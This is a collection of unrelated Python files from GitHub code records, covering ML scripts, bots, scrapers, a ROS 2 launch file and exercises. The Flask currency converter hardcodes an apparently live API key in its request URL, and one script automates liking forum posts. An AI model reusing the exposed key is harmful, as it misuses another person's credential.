conn.like_forum('carolina-hurricanes.26', 5)\n logger.info('going to sleep for a bit...')\n time.sleep(240)\n\n\n # like a specific thread\n # conn.like_thread('threads/gdt-edmonton-carolina-6-19-stanley-cup-finals-game-7.260815', False)\n\n conn.logout()\n","repo_name":"Identity404/ILikeHFCanes","sub_path":"HFBoards.py","file_name":"HFBoards.py","file_ext":"py","file_size_in_byte":8636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"21850867700","text":"import pytesseract\nimport cv2\nimport numpy as np\nimport imutils\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\ndigit_prediction = tf.keras.models.load_model('model/final_model')\ndigit_prediction.summary()\n\n\ndef detect(image):\n nh = image.shape[0]\n nw = image.shape[1]\n cell = image[int(nh / 20):int(19 * nh / 20), int(nw / 20): int(19 * nw / 20)]\n gray = cv2.cvtColor(cell, cv2.COLOR_BGR2GRAY)\n gray[np.where(gray >= 150)] = 255\n gray[np.where(gray < 150)] = 0\n gray = cv2.resize(gray, (28, 28))\n gray[np.where(gray >= 200)] = 255\n gray[np.where(gray < 200)] = 0\n gray = cv2.bitwise_not(gray)\n if (np.sum(gray) == 0):\n return 0\n return np.argmax(digit_prediction.predict(tf.reshape(gray, [-1, 28, 28, 1])))\n\n\n\n","repo_name":"srikantv03/sudoku-solver","sub_path":"src/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"11352327547","text":"#let’s rename name to movie_title.\n\n#Use the keyword inplace=True so that you modify df rather than creating a new DataFrame!\n\nimport codecademylib\nimport pandas as pd\n\ndf = pd.read_csv('imdb.csv')\n\n# Rename columns here\ndf.rename(columns={\n'name': 'movie_title' \n},\ninplace = 'True'\n)\nprint(df)\n","repo_name":"Arif-Badhon/Code-Academy","sub_path":"Code-Academy/Data Science Path/Data Manupulation with Pandas/RenameingColumn.py","file_name":"RenameingColumn.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"290159849","text":"from odoo import api, fields, models\n\n\nclass ProductPackLine(models.Model):\n _name = 'product.pack.line'\n # 1º Historia de usuario\n pack_id = fields.Many2one(\n comodel_name='product.product',\n string=\"Pack\",\n )\n component_id = fields.Many2one(\n comodel_name='product.product',\n string=\"Component\",\n required=True,\n )\n quantity = fields.Integer(\n string=\"Quantity\",\n )\n price = fields.Float(\n string=\"Price\",\n )\n\n @api.onchange('component_id')\n def onchange_component_id(self):\n self.price = self.component_id.list_price\n","repo_name":"QubiQ/sistema-doq","sub_path":"practica_final_2/models/product_pack_line.py","file_name":"product_pack_line.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"32789760862","text":"import os\nimport shutil\nfrom datetime import datetime\n\nimport requests\nfrom covid import Covid\nfrom pyrogram import Filters, InlineKeyboardButton, InlineKeyboardMarkup\n\nfrom covidinfo import setbot\n\n\n@setbot.on_message(Filters.command(\"corona\") | Filters.command(\"corona@coronainfo19bot\"))\nasync def corona(client, message):\n args = message.text.split(None, 1)\n if len(args) == 1:\n await message.reply(\"`usage: /corona (country)`\")\n return\n covid = Covid()\n data = covid.get_data()\n country = args[1]\n country_data = get_country_data(country.capitalize(), data)\n if country_data:\n output_text = \"`Confirmed : {}\\n`\".format(country_data[\"confirmed\"])\n output_text += \"`Active : {}`\\n\".format(country_data[\"active\"])\n output_text += \"`Deaths : {}`\\n\".format(country_data[\"deaths\"])\n output_text += \"`Recovered : {}`\\n\".format(country_data[\"recovered\"])\n output_text += \"`Last update : {}`\\n\". \\\n format(datetime.utcfromtimestamp(country_data[\"last_update\"] // 1000).strftime('%Y-%m-%d %H:%M:%S'))\n output_text += \"`Data provided by `Johns Hopkins University\"\n else:\n output_text = \"`No information yet about this country!`\"\n await message.reply(\"**Corona Virus Info in {}**:\\n\\n{}\".format(country.capitalize(), output_text))\n\n\ndef get_country_data(country, world):\n for country_data in world:\n if country_data[\"country\"] == country:\n return country_data\n return\n\n\n@setbot.on_message(Filters.command(\"coronastats\") | Filters.command(\"coronastats@coronainfo19bot\"))\nasync def coronastats(client, message):\n url = 'https://covid-19-api-2-i54peomv2.now.sh/api/og'\n response = requests.get(url, stream=True)\n with open('og', 'wb') as out_file:\n shutil.copyfileobj(response.raw, out_file)\n del response\n os.rename(\"og\", \"og.png\")\n await client.send_photo(message.chat.id, \"og.png\", caption=\"Source\")\n os.remove(\"og.png\")\n\n\n@setbot.on_message(Filters.command(\"start\") | Filters.command(\"start@coronainfo19bot\"))\nasync def start(client, message):\n list_button = InlineKeyboardMarkup([[InlineKeyboardButton(\"Add me to your group\", url=\"https://t.me\"\n \"/coronainfo19bot?startgroup=new\")],\n [InlineKeyboardButton(\"Support Group\", url=\"https://t.me/nanabotsupport\"),\n InlineKeyboardButton(\"Help\", callback_data=\"help\")]])\n await client.send_message(message.chat.id, \"Hey there! 
I'm here can give you information about Covid-19 Cases!\\n\"\n \"click /help to see what can i do\\n\\n\"\n \"you can also add this bot to your group for getting data about covid-19\\n\"\n \"Join to our group @nanabotsupport if you need help / problem with this bot\\n\\n\"\n \"this bot made by @legenhand\", reply_markup=list_button)\n\n\ndef dynamic_data_filter(data):\n return Filters.create(\n lambda flt, query: flt.data == query.data,\n data=data # \"data\" kwarg is accessed with \"flt.data\" above\n )\n\n\n@setbot.on_callback_query(dynamic_data_filter(\"help\"))\nasync def tulung(client, message):\n helptext = \"\"\"\nCheck info of cases corona virus disease 2019\n\n──「 **Info Covid** 」──\n-> `/corona (country)`\n\n──「 **get graph stats of global cases** 」──\n-> `/coronastats`\n\"\"\"\n await message.message.edit(helptext)\n\n\n@setbot.on_message(Filters.command(\"help\") | Filters.command(\"help@coronainfo19bot\"))\nasync def helpcommand(client, message):\n helptext = \"\"\"\n Check info of cases corona virus disease 2019\n\n ──「 **Info Covid** 」──\n -> `/corona (country)`\n\n ──「 **get graph stats of global cases** 」──\n -> `/coronastats`\n \"\"\"\n await message.reply(helptext)\n","repo_name":"legenhand/covid-bot","sub_path":"covidinfo/assistant/corona_virus.py","file_name":"corona_virus.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"16042915602","text":"def fact(num):\n \"\"\"\n Input: An integer num >= 0\n Output: Factorial value \n \"\"\"\n if num <= 1:\n return 1\n else:\n return num * fact(num-1)\n\nfor idx in range(0, 11):\n print(\"Current input: \" + str(idx))\n print(\"Factorial value: \" + str(fact(idx)))\n print(\"---------------------------------\")\n\n","repo_name":"ashutoshpurushottam/Algorithms","sub_path":"1-Grokking/03-Recursion/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"11090211436","text":"from qiskit import QuantumCircuit, ClassicalRegister, QuantumRegister\nfrom qiskit import available_backends, execute\n\n# Create a Quantum Register and classical registers with 2 qubits and 2 classical bits.\nq = QuantumRegister(2)\nc = ClassicalRegister(2)\nqc = QuantumCircuit(q, c)\n\n # Add a H gate on qubit 0 to create a superposition\nqc.h(q[0])\n# Add a controlled not (CX) with qubit 0 as control and qubit 1 target\nqc.cx(q[0], q[1])\n\n# Perform a unitary transformation to obtain one of the other three bell states\n# if we want to send 0 then we don't do anything as we are already in the bell computational basis\n# if we want to send 1 then perform a X transformation\n# if we want to send 2 then perform a Z transformation\n# if we want to send 3 then perform a XZ transformation\n\nqc.x(q[0]) \n# qc.z(q[0]) \n# qc.x(q[0])\n# qc.z(q[0])\n\n# To obtain the encoded value reapply the CX and H transformations followed by a measurement\n# This enables us to uncover the value by detecting which bell state we are in\nqc.cx(q[0], q[1])\nqc.h(q[0])\n\n# Add a Measure gate to see the state.\nqc.measure(q, c)\n\n# Compile and run the Quantum circuit on a simulator backend\njob_sim = execute(qc, \"local_qasm_simulator\")\nsim_result = job_sim.result()\nprint(sim_result.get_counts(qc))","repo_name":"stevenatkin/quantum","sub_path":"superdense.py","file_name":"superdense.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
+{"seq_id":"34958387662","text":"import time, re\nfrom lxml import etree\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom flask import current_app\n\n\ndef add_taobao_cart(cart_list, cookie):\n '''\n 加入淘宝购物车\n '''\n driver = webdriver.Chrome()\n # options = webdriver.ChromeOptions()\n # options.add_argument('--headless')\n # driver = webdriver.Chrome(chrome_options=options)\n driver.maximize_window()\n wait = WebDriverWait(driver, 30)\n\n driver.get('https://www.taobao.com/')\n for key in cookie: # 添加cookie\n driver.add_cookie({\n 'domain': '.taobao.com',\n 'name': key,\n 'value': cookie[key],\n 'path': '/'\n })\n\n for item in cart_list: # 逐个加入购物车\n goods_url, goods_sku1, goods_sku2, quantity = item['goods_url'], item['goods_sku1'], item['goods_sku2'], item['quantity']\n driver.get(goods_url)\n wait.until(EC.presence_of_element_located((By.XPATH, '//*[contains(@id, \"Stock\")]')))\n html = driver.page_source\n doc = etree.HTML(html)\n goods_sku = [goods_sku1, goods_sku2]\n for item in goods_sku:\n if item:\n data_property = re.split(r':', item)[0]\n sku = re.split(r':', item)[1]\n if len(doc.xpath('//ul[@data-property=\"{}\"]/li'.format(data_property))) != 1: # 商品属性只有1个时,已自动选中\n try:\n sku_matched = wait.until(\n EC.element_to_be_clickable((By.XPATH, '//ul[@data-property=\"{0}\"]/li//span[text()=\"{1}\"]/..'.format(data_property, sku))))\n sku_matched.send_keys(Keys.ENTER)\n time.sleep(0.2)\n except:\n current_app.logger.error('无法选中属性', exc_info=True)\n try:\n input = wait.until(\n EC.presence_of_element_located((By.XPATH, '//*[contains(@class, \"tb-amount\")]//input')))\n input.send_keys(Keys.BACK_SPACE)\n input.send_keys(quantity)\n time.sleep(0.3)\n except:\n current_app.logger.error('无法输入数量', exc_info=True)\n try:\n submit = wait.until(\n EC.element_to_be_clickable((By.XPATH, '//div[contains(@class, \"tb-action\")]/div[2]/a')))\n submit.send_keys(Keys.ENTER)\n time.sleep(0.2)\n except:\n current_app.logger.error('无法加入购物车', exc_info=True)\n time.sleep(0.5)\n\n # 跳转至购物车,查询购物车状态\n driver.get('https://cart.taobao.com/')\n wait.until(EC.presence_of_element_located((By.XPATH, '//div[@id=\"J_OrderList\"]')))\n html = driver.page_source\n driver.quit()\n doc = etree.HTML(html)\n order_items = doc.xpath('//div[@id=\"J_OrderList\"]/div')\n order_cart_list = []\n for item in order_items:\n goods_title = item.xpath('.//div[@class=\"item-basic-info\"]/a/text()')[0]\n goods_price = item.xpath('.//em[@class=\"J_Price price-now\"]/text()')[0]\n quantity = item.xpath('.//div[@class=\"item-amount \"]/input/@data-now')[0]\n order_cart_list.append({'goodsTitle': goods_title, 'goodsPrice': goods_price, 'quantity': quantity})\n\n return order_cart_list\n\n","repo_name":"DavidLin3/order_cart","sub_path":"app/add_taobao_cart.py","file_name":"add_taobao_cart.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"27171246543","text":"from flask import Flask,request,jsonify\r\nimport requests\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/',methods=['POST'])\r\ndef index():\r\n data = request.get_json()\r\n source_currency = data['queryResult']['parameters']['unit-currency']['currency']\r\n amount = data['queryResult']['parameters']['unit-currency']['amount']\r\n target_currency = data['queryResult']['parameters']['currency-name']\r\n\r\n\r\n cf = fetch_conversion_factor(source_currency,target_currency)\r\n final_amount = amount * cf\r\n final_amount = round(final_amount,2)\r\n response = {\r\n 'fulfillmentText': \"{} {} is {} {}\".format(amount,source_currency,final_amount,target_currency)\r\n }\r\n return jsonify(response)\r\n\r\ndef fetch_conversion_factor(source,target):\r\n url = \"https://api.freecurrencyapi.com/v1/latest?apikey=fca_live_oBmJBO9usRezGVW6rMvKTj0hDXe668HXeXcof7xX¤cies={}&base_currency={}\".format(target,source)\r\n response = requests.get(url)\r\n response = response.json()\r\n return response['data']['{}'.format(target)]\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)","repo_name":"gvamsi-10/currency_converter","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"11339345609","text":"from typing import List\n\nfrom launch import LaunchContext, LaunchDescription, LaunchDescriptionEntity\nfrom launch.actions import DeclareLaunchArgument, OpaqueFunction, RegisterEventHandler\nfrom launch.conditions import IfCondition\nfrom launch.event_handlers import OnProcessExit, OnProcessStart\nfrom launch.substitutions import (\n AndSubstitution,\n LaunchConfiguration,\n NotSubstitution,\n PathJoinSubstitution,\n)\n\nfrom lbr_bringup import LBRMoveGroupMixin\nfrom lbr_description import LBRDescriptionMixin, RVizMixin\nfrom lbr_ros2_control import LBRROS2ControlMixin\n\n\ndef launch_setup(context: LaunchContext) -> List[LaunchDescriptionEntity]:\n ld = LaunchDescription()\n\n robot_description = LBRDescriptionMixin.param_robot_description(sim=False)\n ros2_control_node = LBRROS2ControlMixin.node_ros2_control(\n robot_description=robot_description\n )\n ld.add_action(ros2_control_node)\n\n # joint state broad caster and controller on ros2 control node start\n joint_state_broadcaster = LBRROS2ControlMixin.node_controller_spawner(\n controller=\"joint_state_broadcaster\"\n )\n force_torque_broadcaster = LBRROS2ControlMixin.node_controller_spawner(\n controller=\"force_torque_broadcaster\"\n )\n lbr_state_broadcaster = LBRROS2ControlMixin.node_controller_spawner(\n controller=\"lbr_state_broadcaster\"\n )\n controller = LBRROS2ControlMixin.node_controller_spawner(\n controller=LaunchConfiguration(\"ctrl\")\n )\n\n controller_event_handler = RegisterEventHandler(\n OnProcessStart(\n target_action=ros2_control_node,\n on_start=[\n joint_state_broadcaster,\n force_torque_broadcaster,\n lbr_state_broadcaster,\n controller,\n ],\n )\n )\n ld.add_action(controller_event_handler)\n\n # robot state publisher on joint state broadcaster spawn exit\n robot_state_publisher = LBRROS2ControlMixin.node_robot_state_publisher(\n robot_description=robot_description, use_sim_time=False\n )\n robot_state_publisher_event_handler = RegisterEventHandler(\n OnProcessExit(\n target_action=joint_state_broadcaster, on_exit=[robot_state_publisher]\n )\n )\n ld.add_action(robot_state_publisher_event_handler)\n\n # MoveIt 2\n ld.add_action(LBRMoveGroupMixin.arg_allow_trajectory_execution())\n ld.add_action(LBRMoveGroupMixin.arg_capabilities())\n ld.add_action(LBRMoveGroupMixin.arg_disable_capabilities())\n ld.add_action(LBRMoveGroupMixin.arg_monitor_dynamics())\n ld.add_action(LBRMoveGroupMixin.args_publish_monitored_planning_scene())\n\n # MoveGroup:\n # - requires world frame\n # - urdf only has robot_name/world\n # This transform needs publishing\n robot_name = LaunchConfiguration(\"robot_name\").perform(context)\n ld.add_action(\n LBRDescriptionMixin.node_static_tf(\n tf=[0, 0, 0, 0, 0, 0], # keep zero\n parent=\"world\",\n child=PathJoinSubstitution(\n [\n robot_name,\n \"world\",\n ] # results in robot_name/world\n ),\n )\n )\n\n model = LaunchConfiguration(\"model\").perform(context)\n moveit_configs_builder = LBRMoveGroupMixin.moveit_configs_builder(\n robot_name=model,\n package_name=f\"{model}_moveit_config\",\n )\n movegroup_params = LBRMoveGroupMixin.params_move_group()\n\n ld.add_action(\n LBRMoveGroupMixin.node_move_group(\n parameters=[\n moveit_configs_builder.to_dict(),\n movegroup_params,\n {\"use_sim_time\": False},\n ],\n condition=IfCondition(LaunchConfiguration(\"moveit\")),\n namespace=robot_name,\n )\n )\n\n # RViz and MoveIt\n rviz_moveit = RVizMixin.node_rviz(\n rviz_config_pkg=f\"{model}_moveit_config\",\n rviz_config=\"config/moveit.rviz\",\n 
parameters=LBRMoveGroupMixin.params_rviz(\n moveit_configs=moveit_configs_builder.to_moveit_configs()\n ),\n condition=IfCondition(\n AndSubstitution(LaunchConfiguration(\"moveit\"), LaunchConfiguration(\"rviz\"))\n ),\n remappings=[\n (\"robot_description\", robot_name + \"/robot_description\"),\n (\"robot_description_semantic\", robot_name + \"/robot_description_semantic\"),\n (\"display_planned_path\", robot_name + \"/display_planned_path\"),\n (\"monitored_planning_scene\", robot_name + \"/monitored_planning_scene\"),\n ],\n )\n\n # RViz no MoveIt\n rviz = RVizMixin.node_rviz(\n rviz_config_pkg=\"lbr_bringup\",\n rviz_config=\"config/config.rviz\",\n condition=IfCondition(\n AndSubstitution(\n LaunchConfiguration(\"rviz\"),\n NotSubstitution(LaunchConfiguration(\"moveit\")),\n )\n ),\n )\n\n # RViz event handler\n rviz_event_handler = RegisterEventHandler(\n OnProcessStart(\n target_action=robot_state_publisher, on_start=[rviz_moveit, rviz]\n )\n )\n ld.add_action(rviz_event_handler)\n\n return ld.entities\n\n\ndef generate_launch_description() -> LaunchDescription:\n ld = LaunchDescription()\n ld.add_action(LBRDescriptionMixin.arg_model())\n ld.add_action(LBRDescriptionMixin.arg_robot_name())\n ld.add_action(LBRDescriptionMixin.arg_port_id())\n ld.add_action(\n DeclareLaunchArgument(\n name=\"moveit\",\n default_value=\"false\",\n description=\"Whether to launch MoveIt 2.\",\n )\n )\n ld.add_action(\n DeclareLaunchArgument(\n name=\"rviz\", default_value=\"true\", description=\"Whether to launch RViz.\"\n )\n )\n ld.add_action(LBRROS2ControlMixin.arg_ctrl_cfg_pkg())\n ld.add_action(LBRROS2ControlMixin.arg_ctrl_cfg())\n ld.add_action(LBRROS2ControlMixin.arg_ctrl())\n ld.add_action(OpaqueFunction(function=launch_setup))\n return ld\n","repo_name":"lbr-stack/lbr_fri_ros2_stack","sub_path":"lbr_bringup/launch/real.launch.py","file_name":"real.launch.py","file_ext":"py","file_size_in_byte":5962,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"21"}
+{"seq_id":"31099771055","text":"import requests\nimport urllib.parse\nfrom lxml import html\nfrom .config import config\n\nclass FileReader:\n def readFile(self):\n s=requests.Session()\n headers = {\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n\n # ------------ 1 ---------------------\n payload='LoginFormData.UserName=' + urllib.parse.quote(config[\"IE\"][\"UserName\"]) + '&LoginFormData.Password=' + urllib.parse.quote(config[\"IE\"][\"Password\"])\n response = s.request(\"POST\", config[\"IE\"][\"URL\"], headers=headers, data=payload)\n\n tree = html.fromstring(response.text)\n div = tree.xpath('//p[@data-testid=\"account-card-account-number\" and text()=\"' + config[\"IE\"][\"AccountId\"] + '\"]/../../..')[0]\n selectedAccountNumber = div.xpath('.//input[@name=\"SelectedAccount.AccountNumber\"]')[0].value\n rvt = div.xpath('.//input[@name=\"rvt\"]')[0].value\n flowFormId = div.xpath('.//input[@name=\"flow-form-id\"]')[0].value\n flowHandler = div.xpath('.//input[@name=\"FlowHandler\"]')[0].value\n flowScreenName = div.xpath('.//input[@name=\"FlowScreenName\"]')[0].value\n\n # ------------ 2 ---------------------\n payloadOnEvent = 'SelectedAccount.AccountNumber=' + selectedAccountNumber + '&triggers_event=AccountSelection.ToAccountAndMeterDetails&rvt=' + rvt + '&flow-form-id=' + flowFormId + '&FlowHandler=' + flowHandler + '&FlowScreenName=' + flowScreenName\n responseOnEvent = s.request(\"POST\", config[\"IE\"][\"URL\"] + \"/Accounts/OnEvent\", headers=headers, data=payloadOnEvent)\n treeAccount = html.fromstring(responseOnEvent.text)\n accountLink = treeAccount.xpath('//a[@data-testid=\"nav-details-link\"]/@href')[0]\n\n # -------------- 3 --------------------\n accountContent = s.get(config[\"IE\"][\"URL\"] + accountLink)\n treeDownload = html.fromstring(accountContent.text)\n downloadLink = treeDownload.xpath('//a[@data-testid=\"details-consumption-data-download\"]/@href')[0]\n\n\n # -------------- 4 --------------------\n downloadContent = s.get(config[\"IE\"][\"URL\"] + downloadLink)\n return downloadContent.content.decode(\"utf-8\")","repo_name":"tassotirap/ei2ha","sub_path":"fileReader.py","file_name":"fileReader.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
+{"seq_id":"23647499789","text":"import sklearn.metrics as metrics\nimport matplotlib.pyplot as plt\nimport csv\nimport numpy as np\nimport scipy\nimport scipy.io as sio\nimport itertools\nimport operator\nimport scipy.stats\nfrom collections import Counter\nfrom numpy import genfromtxt\n\nimport pdb\n\nMAX_HEIGHT = 100\nMIN_LEAF = 5\nDEBUGGING = False\nDATASET = \"Census\"\nITERS = 100\nFOREST = True\n\ndef shrink(size):\n if (DEBUGGING):\n return size // 120, size // 20\n else:\n return size // 6, size\n\ndef judge(number):\n\tif (number > 0.5):\n\t\treturn 1\n\telse:\n\t\treturn 0\njudge = np.vectorize(judge)\n\nclass Node:\n def __init__(self):\n self.split_rule = (None, None, None)\n self.data_points = []\n self.left = None\n self.right = None\n self.label = None\n\n def set_leaf(self, data, labels):\n self.data_points = train_data\n self.label = Counter(labels).most_common(1)[0][0]\n\nclass DecisionTree():\n def __init__(self, max_height = MAX_HEIGHT):\n self.root = Node()\n self.max_height = max_height\n\n def train(self, train_data, train_labels, weights = np.zeros((1,1))):\n if (weights.shape == (1,1)):\n weights = np.ones(train_data.shape[0]) / train_data.shape[0]\n self._train(train_data, train_labels, self.root, weights, 0)\n\n def _train(self, train_data, train_labels, node, weights, height):\n\n # if (height < 3):\n # print(\"At height: {0}\".format(height))\n\n # When there is only one training data, or only one label, or exceeding max_height\n # Define this node as a leaf\n if train_data.shape[0] < MIN_LEAF or height >= self.max_height or len(set(train_labels)) == 1:\n # print(\"Leaf height: {0}\".format(height))\n node.set_leaf(train_data, train_labels)\n\n # Else try to separate the data\n else:\n node.left = Node()\n node.right = Node()\n node.split_rule = self.segmeter(train_data, train_labels, weights)\n\n # When it turned out that the data is not separable\n if (node.split_rule == (-1, -1, False)):\n # Print the leaf height.\n # print(\"Leaf height: {0}\".format(height))\n node.set_leaf(train_data, train_labels)\n\n else:\n l_cond = train_data[:,node.split_rule[0]] <= node.split_rule[1]\n r_cond = train_data[:,node.split_rule[0]] > node.split_rule[1]\n nan_cond = np.isnan(train_data[:,node.split_rule[0]])\n train_data_l = train_data[l_cond]\n train_data_r = train_data[r_cond]\n train_labels_l = train_labels[l_cond]\n train_labels_r = train_labels[r_cond]\n weights_l = weights[l_cond]\n weights_r = weights[r_cond]\n\n # Treat nan as mode\n # If mode is greater than threshold, then the nan data are put to right\n train_data_nan = train_data[nan_cond]\n train_labels_nan = train_labels[nan_cond]\n weights_nan = weights[nan_cond]\n if (node.split_rule[2]):\n train_data_r = np.r_[train_data_r, train_data_nan]\n train_labels_r = np.r_[train_labels_r, train_labels_nan]\n weights_r = np.r_[weights_r, weights_nan]\n else:\n weights_l = np.r_[weights_l, weights_nan]\n train_data_l = np.r_[train_data_l, train_data_nan]\n train_labels_l = np.r_[train_labels_l, train_labels_nan]\n\n\n self._train(train_data_l, train_labels_l, node.left, weights_l, height + 1)\n self._train(train_data_r, train_labels_r, node.right, weights_r, height + 1)\n\n def predict(self, test_data):\n predictions = np.zeros(test_data.shape[0])\n for i in range(0, test_data.shape[0]):\n predictions[i] = self._predict(test_data[i], self.root)\n return predictions\n\n def _predict(self, data_point, node):\n if (node.label != None):\n return node.label\n else:\n if data_point[node.split_rule[0]] > 
node.split_rule[1] or (np.isnan(data_point[node.split_rule[0]]) and node.split_rule[2]):\n return self._predict(data_point, node.right)\n else:\n return self._predict(data_point, node.left)\n\n # Calculate how bad a split is\n def impurity(self, left_labels, left_weights, right_labels, right_weights):\n return (np.sum(left_weights) * self.entropy(left_labels) + \\\n np.sum(right_weights) * self.entropy(right_labels)) / \\\n (np.sum(left_weights) + np.sum(right_weights))\n\n # Calculate the entropy of an array of labels\n def entropy(self, labels):\n if labels.shape[0] == 0:\n return 0\n counts = np.array(Counter(labels).most_common())[:,1]\n entropy = scipy.stats.entropy(counts)\n return entropy\n\n # Find the best split for data and labels\n def segmeter(self, data, labels, weights):\n max_info_gain = 0\n max_split_rule = (-1, -1, False)\n max_split_rule_mode = np.nan\n modes = scipy.stats.mode(data)[0][0]\n\n ratio = (np.sqrt(data.shape[1]) + 1) / data.shape[1]\n on_cnt = int(data.shape[1] * ratio)\n switch = np.array(([1] * on_cnt) + [0] * (data.shape[1] - on_cnt))\n np.random.shuffle(switch)\n\n # Find the split that maximize infomation gain\n # For each feature\n for feature in range(0, data.shape[1]):\n\n if not switch[feature]:\n continue\n\n values = data[:, feature]\n mode = modes[feature]\n dist_values = np.unique(values)\n dist_values = dist_values[~np.isnan(dist_values)]\n\n\n\n # For each possible split point\n for value in dist_values:\n\n\n left_labels = labels[data[:, feature] <= value]\n left_weights = weights[data[:, feature] <= value]\n right_labels = labels[data[:, feature] > value]\n right_weights = weights[data[:, feature] > value]\n\n # Treat nan as mode of this feature.\n # If mode(which was nan) are greater than threshold, then put it to the right\n nan_labels = labels[np.isnan(data[:,feature])]\n nan_weights = weights[np.isnan(data[:,feature])]\n if (mode > value):\n right_labels = np.r_[right_labels, nan_labels]\n right_weights = np.r_[right_weights, nan_weights]\n else:\n left_labels = np.r_[left_labels, nan_labels]\n left_weights = np.r_[left_weights, nan_weights]\n\n # The value is max, cannot separate\n if (left_labels.shape[0] == 0 or right_labels.shape[0] == 0):\n info_gain = 0\n else:\n info_gain = self.entropy(labels) - self.impurity(left_labels, left_weights, right_labels, right_weights)\n\n if (info_gain > max_info_gain):\n max_split_rule = (feature, value, mode > value)\n max_info_gain = info_gain\n\n return max_split_rule\n\n def print_root(self):\n print(self.root.split_rule)\n\nclass Forest():\n def __init__(self, iters = ITERS):\n self.trees = []\n self.weights = []\n self.iters = iters\n\n def train(self, train_data, train_labels):\n self.alphas = np.ones(self.iters)\n self.weights = np.ones(train_data.shape[0]) / train_data.shape[0]\n for t in range(0, self.iters):\n cur_tree = DecisionTree()\n print(\"iter: {0}\".format(t))\n # indices = np.random.rand((train_data.shape[0])) > 0.5\n # cur_train_data = train_data[indices]\n # cur_train_labels = train_labels[indices]\n # cur_weights = self.weights[indices]\n # pdb.set_trace()\n cur_tree.train(train_data, train_labels, self.weights)\n train_pred = cur_tree.predict(train_data)\n e = metrics.accuracy_score(train_labels, train_pred)\n self.alphas[t] = 0.5 * np.log(e / (1 - e))\n for i in range(0, train_data.shape[0]):\n indicator = int(train_labels[i] == train_pred[i])\n self.weights[i] = self.weights[i] * np.exp( -self.alphas[t] * indicator)\n self.weights = self.weights / np.sum(self.weights)\n 
self.trees.append(cur_tree)\n cur_tree.print_root()\n\n def predict(self, test_data):\n predictions = np.zeros(test_data.shape[0])\n self.alphas = self.alphas / np.sum(self.alphas)\n for i in range(0, self.iters):\n predictions += self.trees[i].predict(test_data) * self.alphas[i]\n return judge(predictions)\n\n\ndef load_dataset(dataset = DATASET):\n filename = 'data/census_data/census_data.mat'\n data = sio.loadmat(filename)\n train_data = data['training_data']\n train_labels = data['training_labels'][0]\n test_data = data['test_data']\n\n rng_state = np.random.get_state()\n np.random.shuffle(train_data)\n np.random.set_state(rng_state)\n np.random.shuffle(train_labels)\n\n val_size, train_size = shrink(train_data.shape[0])\n val_data, val_labels = train_data[0:val_size], train_labels[0:val_size]\n train_data, train_labels = train_data[val_size:train_size], train_labels[val_size:train_size]\n\n return train_data, train_labels, val_data, val_labels, test_data\n\ntrain_data, train_labels, val_data, val_labels, test_data = load_dataset()\nif (FOREST):\n\tclassifier = Forest()\nelse:\n\tclassifier = DecisionTree()\n\nclassifier.train(train_data, train_labels)\ntrain_pred = classifier.predict(train_data)\nval_pred = classifier.predict(val_data)\n\nprint(\"Train Accuracy: {0}\".format(metrics.accuracy_score(train_labels, train_pred)))\nprint(\"Validation Accuracy: {0}\".format(metrics.accuracy_score(val_labels, val_pred)))\n\ntest_pred = classifier.predict(test_data)\nid = np.array(list(range(1,len(test_pred) + 1)))\noutput = np.array([id,test_pred]).T\nnp.savetxt(DATASET + \".csv\", output, delimiter = ',')\n","repo_name":"harrytflv/census","sub_path":"decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":10164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"18219026072","text":"class Solution:\n def numberOfPairs(self, nums: List[int]) -> List[int]:\n ans = [0] * 2\n count = collections.Counter(nums)\n\n for i in range(101):\n ans[0] += count[i] // 2\n ans[1] += count[i] & 1\n\n return ans\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/2341. Maximum Number of Pairs in Array/2341.py","file_name":"2341.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"}
